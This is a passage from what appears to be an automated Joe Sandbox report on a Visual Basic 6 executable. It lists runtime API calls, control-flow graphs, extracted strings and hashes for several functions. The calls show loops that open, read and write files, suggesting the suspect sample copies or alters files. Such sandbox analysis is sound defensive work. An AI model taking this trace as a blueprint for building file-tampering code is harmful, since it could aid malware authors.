                                                                                      • Part of subcall function 00411F00: __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00411F7D
                                                                                      • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00411F86
                                                                                      • Part of subcall function 00411F00: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00411F97
                                                                                      • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?,004156AF), ref: 0041565A
                                                                                      • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415667
                                                                                      • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415674
                                                                                      • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415681
                                                                                      • Part of subcall function 00411F00: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041568D
                                                                                      • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 00415696
                                                                                      • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 0041569F
                                                                                      • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 004156A8
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CEE1
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407978,0000005C), ref: 0040CF27
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040CF42
                                                                                    • __vbaFreeStr.MSVBVM60(0040CFB1), ref: 0040CFA1
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040CFAA
                                                                                      • Part of subcall function 004115D0: __vbaErase.MSVBVM60(004065BC,0042C078,0000000A,-00000061,660E0EBE), ref: 00411B74
                                                                                      • Part of subcall function 004115D0: __vbaRedim.MSVBVM60(00000000,00000024,0042C078,004065BC,00000001,00000003,00000001), ref: 00411B97
                                                                                      • Part of subcall function 004115D0: __vbaAryLock.MSVBVM60(?,00000000), ref: 00411BAA
                                                                                      • Part of subcall function 004115D0: __vbaGenerateBoundsError.MSVBVM60 ref: 00411BCE
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 00411BFE
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?), ref: 00411C14
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 00411C1A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00411C2C
                                                                                      • Part of subcall function 004115D0: __vbaAryUnlock.MSVBVM60(?), ref: 00411C3E
                                                                                      • Part of subcall function 004115D0: __vbaAryLock.MSVBVM60(?,00000000), ref: 00411C4F
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0040CFD8
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040CFFE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0040D02E
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000728), ref: 0040D081
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004077C4,0000001C), ref: 0040D0C9
                                                                                    • __vbaI2I4.MSVBVM60 ref: 0040D0ED
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040D0FA
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D164
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$Copy$List$Error$CheckHresult$Bstr$ChkstkSystem$AnsiNew2Unicode$#580$#525#600File$#517#537#616Unlock$#631$#516#570#648Open$#618#690Get3LockNameSeek$#529#535#598#611#661#669#705#709BoundsCloseComputerDestructEraseFromGenerateGet4OverflowPathRedimUser
                                                                                    • String ID: MR$ PR$ RO$ RU$ SE$:%7$Once$at $at.$system32\drivers\$system\$yLZ$~
                                                                                    • API String ID: 3992495243-2767012170
                                                                                    • Opcode ID: c75b1a3e694dbd6f5d10d2331ab2ca9d09b35fafcf85166375154907e56220f4
                                                                                    • Instruction ID: c9e735e97b199634a30fa5df19e6cf838b9fc4480779932f55755727901e6869
                                                                                    • Opcode Fuzzy Hash: c75b1a3e694dbd6f5d10d2331ab2ca9d09b35fafcf85166375154907e56220f4
                                                                                    • Instruction Fuzzy Hash: D2531A75A00208EFDB14DFA0EE89BDEBBB5EF48304F108169E506B72A0DB745A45CF59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004218D0 Relevance: 161.5, APIs: 91, Strings: 1, Instructions: 456COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 384 4218d0-4219be __vbaChkstk __vbaStrCopy * 3 __vbaOnError #648 __vbaFreeVar __vbaI2I4 __vbaFileOpen __vbaI2I4 #570 __vbaLenBstr 385 4219c4-4219c7 384->385 386 42203f-422045 __vbaErrorOverflow 384->386 385->386 387 4219cd-4219db 385->387 388 4219e1-421ab0 __vbaLenBstr #525 __vbaStrMove __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 __vbaStrCopy call 4115d0 __vbaStrMove call 4115d0 __vbaStrMove __vbaStrCmp __vbaFreeStrList 387->388 389 421adf-421af6 __vbaI2I4 __vbaFileClose 387->389 396 421ab2-421b08 388->396 397 421ac1-421ad8 __vbaI2I4 __vbaFileClose 388->397 390 421fd1-422027 __vbaFreeStr * 5 389->390 396->386 400 421b0e-421b56 __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 396->400 397->390 400->386 401 421b5c-421b5f 400->401 401->386 402 421b65-421c13 __vbaI2I4 __vbaFileSeek call 415af0 #648 __vbaFreeVar __vbaI2I4 __vbaFileOpen #525 __vbaStrMove 401->402 405 421c19-421c26 402->405 406 421d16-421e0b __vbaI2I4 __vbaFileClose call 415af0 #648 __vbaFreeVar __vbaI2I4 __vbaFileOpen __vbaI2I4 __vbaFileClose #580 __vbaI2I4 __vbaFileOpen #525 __vbaStrMove 405->406 407 421c2c-421c39 405->407 413 421e11-421e1e 406->413 407->386 409 421c3f-421c45 407->409 411 421c47-421c91 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 409->411 412 421c9c-421ca9 409->412 411->386 414 421c97-421c9a 411->414 412->386 415 421caf-421cb2 412->415 416 421e24-421e31 413->416 417 421f1b-421fcb __vbaI2I4 __vbaFileClose __vbaI2I4 __vbaFileClose __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStr __vbaFreeVar #600 413->417 418 421d11 414->418 415->386 419 421cb8-421d0b #525 __vbaStrMove __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 415->419 416->386 420 421e37-421e3d 416->420 417->390 418->405 419->418 421 421e94-421ea1 420->421 422 421e3f-421e89 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 420->422 421->386 424 421ea7-421eaa 421->424 422->386 423 421e8f-421e92 422->423 425 421f09-421f16 #598 423->425 424->386 426 421eb0-421f03 #525 __vbaStrMove __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 424->426 425->413 426->425
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,0040C78D,00000000,00000000), ref: 004218EE
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042191B
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00421927
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00421933
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00421942
                                                                                    • #648.MSVBVM60(0000000A), ref: 00421961
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00421970
                                                                                    • __vbaI2I4.MSVBVM60(?), ref: 00421984
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00421992
                                                                                    • __vbaI2I4.MSVBVM60 ref: 004219A2
                                                                                    • #570.MSVBVM60(00000000), ref: 004219A9
                                                                                    • __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004219B6
                                                                                    • __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004219ED
                                                                                    • #525.MSVBVM60(00000000), ref: 004219F4
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004219FF
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00421A0F
                                                                                    • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00421A1A
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00421A2A
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00421A37
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00421A4C
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00421A60
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                      • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                      • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 00421A75
                                                                                    • __vbaStrCmp.MSVBVM60(00000000), ref: 00421A7C
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00421A9E
                                                                                    • __vbaI2I4.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00421ACB
                                                                                    • __vbaFileClose.MSVBVM60(00000000,?,?,00000000,Function_000032B6), ref: 00421AD2
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00421AE9
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00421AF0
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00421B1B
                                                                                    • __vbaFileSeek.MSVBVM60(?,00000000), ref: 00421B26
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00421B36
                                                                                    • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 00421B43
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00421B72
                                                                                    • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 00421B7B
                                                                                      • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                      • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                      • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                      • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                    • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BAA
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BB9
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BCD
                                                                                    • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BDB
                                                                                    • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BED
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BF8
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421C51
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421C5E
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421C6E
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421C7B
                                                                                    • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CB9
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CC4
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CD4
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CE1
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CF1
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CFE
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D20
                                                                                    • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D27
                                                                                    • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D56
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D65
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D79
                                                                                    • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D87
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D97
                                                                                    • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D9E
                                                                                    • #580.MSVBVM60(?,00000026,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DB1
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DC5
                                                                                    • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DD3
                                                                                    • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DE5
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DF0
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421E49
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421E56
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421E66
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421E73
                                                                                    • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421EB1
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421EBC
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421ECC
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421ED9
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421EE9
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421EF6
                                                                                    • #598.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F10
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F25
                                                                                    • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F2C
                                                                                    • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F3C
                                                                                    • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F43
                                                                                    • __vbaStrCat.MSVBVM60(004086A8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F59
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F64
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F71
                                                                                    • #600.MSVBVM60(00000008,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F87
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F96
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F9F
                                                                                    • #600.MSVBVM60(00004008,00000000), ref: 00421FC5
                                                                                    • __vbaFreeStr.MSVBVM60(00422028), ref: 00421FFD
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00422006
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,Function_000032B6), ref: 0042200F
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00422018
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00422021
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0042203F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$FileMove$CloseGet3$#525$CopyOpenPut3$#516#631#648BstrErrorSeek$#580#600Chkstk$#529#537#570#598ListOverflow
                                                                                    • String ID: E
                                                                                    • API String ID: 1020712489-3568589458
                                                                                    • Opcode ID: 76b9ac4220b8a9f889e2395c6dcac48a977a3f37ee100d0a82cf9b9d0917f290
                                                                                    • Instruction ID: 07c48357a9df06a9d6fdd80bdbc38809ff137e737b5eacf3c703d77614347229
                                                                                    • Opcode Fuzzy Hash: 76b9ac4220b8a9f889e2395c6dcac48a977a3f37ee100d0a82cf9b9d0917f290
                                                                                    • Instruction Fuzzy Hash: FC22D571900248EBDB04DFE0EA4CBDEBB74FF48305F208169E602BB2A5DBB55A45CB14
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004228E0 Relevance: 54.2, APIs: 36, Instructions: 195COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
                                                                                    • #648.MSVBVM60(0000000A), ref: 00422959
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00422968
                                                                                    • __vbaI2I4.MSVBVM60(?), ref: 0042297C
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
                                                                                    • __vbaI2I4.MSVBVM60 ref: 0042299A
                                                                                    • #570.MSVBVM60(00000000), ref: 004229A1
                                                                                    • __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
                                                                                    • __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
                                                                                    • #525.MSVBVM60(00000000), ref: 004229EC
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004229F7
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422A07
                                                                                    • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422A22
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00422A4A
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00422A68
                                                                                    • __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
                                                                                    • #616.MSVBVM60(00000000), ref: 00422A80
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00422A8B
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                      • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                      • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 00422AA0
                                                                                    • __vbaStrCmp.MSVBVM60(00000000), ref: 00422AA7
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00422ACE
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00422AF4
                                                                                    • __vbaStrMove.MSVBVM60(00000004), ref: 00422B15
                                                                                    • #618.MSVBVM60(00000000), ref: 00422B1C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00422B27
                                                                                    • __vbaI4Str.MSVBVM60(00000000), ref: 00422B2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00422B45
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422B78
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00422B7F
                                                                                    • __vbaFreeStr.MSVBVM60(00422BC8), ref: 00422BB8
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00422BC1
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 00422BDE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$FreeMove$#516#631BstrCopyFile$ErrorList$#525#537#570#616#618#648ChkstkCloseGet3OpenOverflowSeek
                                                                                    • String ID:
                                                                                    • API String ID: 1066637744-0
                                                                                    • Opcode ID: 1310a2324c3d0e81e2fafee1945da52a380a74b9ab6bd6eb12e74ada3333a6c7
                                                                                    • Instruction ID: 321561c39fc04c0ddddefdb4371944f0511538a09f439f710ae93618e622a53c
                                                                                    • Opcode Fuzzy Hash: 1310a2324c3d0e81e2fafee1945da52a380a74b9ab6bd6eb12e74ada3333a6c7
                                                                                    • Instruction Fuzzy Hash: A681D675D00248EFDB04EFA0EA48BDEBBB4FF48705F108169E612B72A0DB745A49CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00415AF0 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 139fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                      • Part of subcall function 004156D0: __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 0041570B
                                                                                      • Part of subcall function 004156D0: __vbaSetSystemError.MSVBVM60(00000000), ref: 00415719
